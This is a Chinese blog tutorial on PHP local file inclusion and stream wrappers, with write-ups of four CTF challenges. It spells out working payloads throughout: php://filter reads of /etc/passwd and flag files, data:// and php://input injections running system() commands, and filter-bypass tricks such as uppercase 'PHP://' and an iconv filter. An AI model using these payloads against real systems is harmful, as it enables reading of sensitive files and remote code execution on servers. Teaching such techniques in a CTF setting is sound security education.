首页 > 其他分享 >本地文件包含漏洞详解与CTF实战

本地文件包含漏洞详解与CTF实战

时间:2024-09-16 19:35:58浏览次数:1  
标签:文件 flag filter 漏洞 CTF 详解 php data 本题

1. 本地文件包含简介

1.1 本地文件包含定义

本地文件包含是一种Web应用程序漏洞,攻击者通过操控文件路径参数,使得服务器端包含了非预期的文件,从而可能导致敏感信息泄露。
常见的攻击方式包括:

  • 包含配置文件、日志文件等敏感信息文件,导致信息泄露。
  • 包含某些可执行文件或利用文件上传功能生成的恶意文件,进而执行任意代码。

示例:

<?php 
$file = $_GET['file']; 
include($file); 
?>

1.2 php伪协议

PHP 伪协议允许开发者通过指定不同的输入源来读取、处理和引入数据,这一特性在文件包含漏洞(如 includerequire)中被滥用,导致攻击者能够通过伪协议来读取敏感数据或执行恶意代码。

以下是在文件包含漏洞中常用的伪协议。

  1. php://input
    • 攻击者可以通过伪协议 php://input 读取 POST 数据并将其作为包含文件的内容。这允许攻击者上传或注入恶意代码,导致代码执行。
    • 用法:
      ?file=php://input+post包
  2. php://filter
    • 通过 php://filter 伪协议,攻击者可以将目标文件的内容以编码的形式返回,这使得攻击者可以读取敏感文件的内容(如配置文件)。
    • 用法
      ?file=php://filter/[参数+过滤器]/resource=[target_file]
    • 示例:
      如果用户传入 file=php://filter/read=convert.base64-encode/resource=/etc/passwd,服务器会返回 /etc/passwd 文件的 base64 编码内容,攻击者可以解码并查看文件。
  3. data://
    • 攻击者可以使用 data:// 伪协议注入任意代码并执行。例如:
    • 示例:
      攻击者可以通过传入 file=data:text/plain,<?php system('ls'); ?>,让 PHP 执行 ls 命令。
      php伪协议的更详细内容参考php伪协议总结

2.CTF实战

本文靶场全部来源于攻防世界

2.1 file_include

1. 题目&分析

highlight_file(__FILE__);的作用是将当前文件的源码(包括文件包含的的内容)以高亮的形式展示,因此我们才能利用这个漏洞。
本题包含了一个check.php,从字面上暗示了会对我们传入的参数进行一定过滤
本题用get方式接收了参数filename,并对文件进行包含,我们可以通过伪协议进行文件读取

2. 解法

本题的过滤非常的严格,而且由于check.php的内容是不知道的,只能不断尝试
php://input 无回显

/?filename=php://input
	post:<?php phpinfo();?>

data:// 无回显

/?filename=data:text/plain,<?php phpinfo();?>

php://filter

/?filename=php://filter/read=convert.base64-encode/resource=flag.php

尝试上方代码显示do not hack!,尝试后发现readbase64-encode被过滤了:read可以直接省略,当参数缺省时默认为read;而后者需要替换其他的过滤器

php://filter/convert.base64-encode/resource=flag.php  
php://filter/convert.quoted-printable-encode/resource=flag.php  
php://filter/string.rot13/resource=flag.php  
php://filter/string.toupper/resource=flag.php  
php://filter/string.tolower/resource=flag.php  
php://filter/string.strip_tags/resource=flag.php

又尝试使用了多个过滤器,发现都显示do not hack!被过滤了。
实际上,本题考察的是下方这个比较冷门的过滤器

?filename=php://filter/convert.iconv.UTF8.UTF16/resource=flag.php

得到flag

3. 小结

本题主要考察了php://filter的用法,尤其是对参数与过滤器的了解。

2.2 fileclude

1. 题目&分析

本题通过get方式接受两个参数file1file2
本题对file1进行包含,此处可以通过伪协议去包含flag.php
本题会读取文件file2的内容并与hello ctf比较,需要注意的是,如果我们直接传入file2=hello ctffile_get_contents函数会去读取hello ctf这个文件,这显然无法得到任何内容。要想满足该if条件,必须通过伪协议将字符串传输给file2,这样PHP 会将字符串 "hello ctf" 作为文件内容进行比较。

2 解法

本题解法就比较简单了,file1通过php://filter读取flagfile2通过data://输入hello ctf。注意最后得到的字符串需要Base64解码,就是flag了

/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=data://text/plain,hello ctf

3. 小结

本题难点在于正确认识file_get_contents函数的性质,从而选择data://输入hello ctf
此外,值得一提的是,使用某些过滤器读取flag出现了报错的现象,这是由于其编码过程破坏了php的语法,使得PHP 解析器无法识别这些字符串。一般来说,使用 Base64 是不出出现这种编码问题的,因为 Base64 是一种可以将二进制数据安全编码为 ASCII 字符的方式,不会对 PHP 代码造成语法错误。不妨只有当Base64被过滤的情况下,再去考虑尝试其他的过滤器。

2.3 fileinclude

1. 题目&分析

页面中给出了两个提示
文件的路径为/var/www/html/,暗示利用伪协议读取的时候需要输入完整路径,而非像之前一样直接包含即可
flag文件的名字叫flag.php

按F12查看网页源代码,给出新的提示。本题在cookie处接受一个language参数,赋值给lan.php拼接后被文件包含,最后文件内容随着index.php被输出前端。

2. 解题

利用hackbar添加cookie,内容如下。得到字符串后需要Base64解码。

language=php://filter/convert.base64-encode/resource=/var/www/html/flag

3. 小结

本题与之前的不同之处有两点

  1. 传参使用的是cookie,而非get。推广出去,get、post、cookie都有可能成为提交的方式。
  2. 本题的包含要求了具体的路径,之前的题目可能是因为设置了include_path使得include直接包含了flag.php

2.4 Web_php_include

1. 题目&分析

本题存在两个get方式接受的参数,但是hello参数被接收后既没有被包含,也不参与条件的判断,认为在本题中不起作用,不过他显然会引起xss漏洞,此处不作详解。
对于page参数,通过strstr函数对php://进行了过滤。

2. 解法一 PHP大写绕过

考虑到php是大小写不敏感的,但是strstr函数是大小写敏感的,可以通过大写PHP://来绕过过滤。
尝试下方语句后发现flag未正常回显,猜测flag所在的文件名并不是flag.php

/?page=PHP://filter/read=convert.base64-encode/resource=flag.php

尝试用PHP://input写入php代码读取

/?page=PHP://input
	<?php system("ls -lah")?> //查看当前目录下所有文件
	<?php system("tac fl4gisisish3r3.php")?> //读取上一步看到的flag文件

3. 解法二 data://执行命令

直接利用data://执行命令得到flag

?page=data://text/plain,<?php system("ls")?>
?page=data://text/plain,<?php system("tac fl4gisisish3r3.php")?>

值得一提的是,如果对写入内容有过滤的话,可以对写入内容进行Base64编码,此处不需要进行编码,直接做即可。

/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJscyIp

4. 小结

本题与之前不同的是flag的文件名称为fl4gisisish3r3.php,这导致了不可能通过直接读取的方式获取flag,而必须要通过命令执行的方式来找到其名称。

宇宙安全声明

本博客所提供的内容仅供学习与交流目的,所有文章、代码及相关资料仅用于提升网络安全知识水平。博主不对任何人因使用博客中提到的技术或工具而产生的任何后果负责。

标签:文件,flag,filter,漏洞,CTF,详解,php,data,本题
From: https://www.cnblogs.com/xinghaihe/p/18416524

相关文章

  • 碰撞检测:详解矩形AABB与OBB碰撞检测算法(附ROS C++可视化)
    碰撞检测:详解矩形AABB与OBB碰撞检测算法(附ROSC++可视化)引言在机器人、游戏开发、计算机图形学等领域,碰撞检测是一个至关重要的任务。碰撞检测的目的是确定两个或多个物体是否发生了碰撞,以便采取相应的措施,如避免碰撞、触发事件等。在二维空间中,矩形是最常见的几何形状之一,而AABB(Ax......
  • 以太网PHY芯片详解
    以太网PHY芯片详解什么是phyphy的基本作用收到MAC过来的数据(PHY没有帧的概念,都是数据而不管什么地址数据还是CRC),进行处理,然后把并行数据转化为串行流数据,再按照物理层的编码规则把数据编码,再变为模拟信号把数据送出去。实现CSMA/CD(多点接入载波监听/冲突检测)的部分功能,可以检......
  • 贪心算法(算法详解+模板+例题)
    1.贪心是什么贪心算法(GreedyAlgorithm)是一种在每一步选择中都采取在当前状态下最好或最优(即最有利)的选择,从而希望导致结果是全局最好的策略。虽然这种策略并不保证一定能得到全局最优解,但在许多情况下,它能提供近似最优解,而且计算效率高。贪心算法通常适用于那些具有“最优......
  • Depth靶机详解
    靶机下载地址https://www.vulnhub.com/entry/depth-1,213/主机发现arp-scan-l端口扫描nmap-sV-A-T4192.168.229.156端口利用http://192.168.229.156:8080/目录扫描dirb"http://192.168.229.156:8080"dirsearch-u"http://192.168.229.156:8080"......
  • Dina靶机详解
    靶机下载https://www.vulnhub.com/entry/dina-101,200/靶机配置默认是桥接模式,切换为NAT模式后重启靶机主机发现arp-scan-l端口扫描nmap-sV-A-T4192.168.229.157发现80端口开启,访问访问网站目录扫描pythondirsearch.py-uhttp://192.168.229.157:8......
  • (CS231n课程笔记)深度学习之损失函数详解(SVM loss,Softmax,熵,交叉熵,KL散度)
    学完了线性分类,我们要开始对预测结果进行评估,进而优化权重w,提高预测精度,这就要用到损失函数。损失函数(LossFunction)是机器学习模型中的一个关键概念,用于衡量模型的预测结果与真实标签之间的差距。损失函数的目标是通过提供一个差距的度量,帮助模型进行优化,最终减少预测误差。......
  • MySQL8.0直方图详解
    1、什么是直方图MySQL8.0开始支持索引之外的数据分布统计信息可选项。它就是直方图(Histogram)。直方图通过估算查询谓词的选择率,以便选择合适的执行计划,也让SQL优化有了更多手段。在DB中,优化器负责将SQL转换为很多个不同的执行计划,然后从中选择一个最优的来实际执行。但是有时候优......
  • [GXYCTF2019]BabyUpload 1
    打开靶机,上传文件抓包后缀不能带ph,大小写也无法绕过,意味着phtml后缀也无法上传对后缀只过滤ph,我们转变思路上传图片马,用.htaccess使图片马以php格式打开上传图片马上传失败,试一试过滤了哪些字符文件内容过滤了<?我们尝试另一种写法后成功上传<scriptlanguage="php">eval......
  • 常用的运维工具:文件传输工具详解(SCP, SFTP)
    在信息技术(IT)运维中,文件传输是日常工作中不可或缺的一部分。运维工程师需要高效、安全地在不同服务器之间传输文件,以确保系统的正常运行和数据的完整性。本文将详细介绍两种常用的文件传输工具——SCP(SecureCopyProtocol)和SFTP(SecureFileTransferProtocol),帮助读者更好......
  • CTF——简单的《MICS》
    文章目录一、MICS1、MISC-LSB2、MISC-循环解压3、MISC-一个不同的压缩包4、MISC-异性相吸5、MISC-仔细找找6、MISC-再来一题隐写7、MISC-找找吧8、MISC-这是一张单纯的图片9、MISC-真假flag10、MISC-真正的黑客才可以看到本质11、MISC-追象者12、MICS-鸡蛋别放在一起......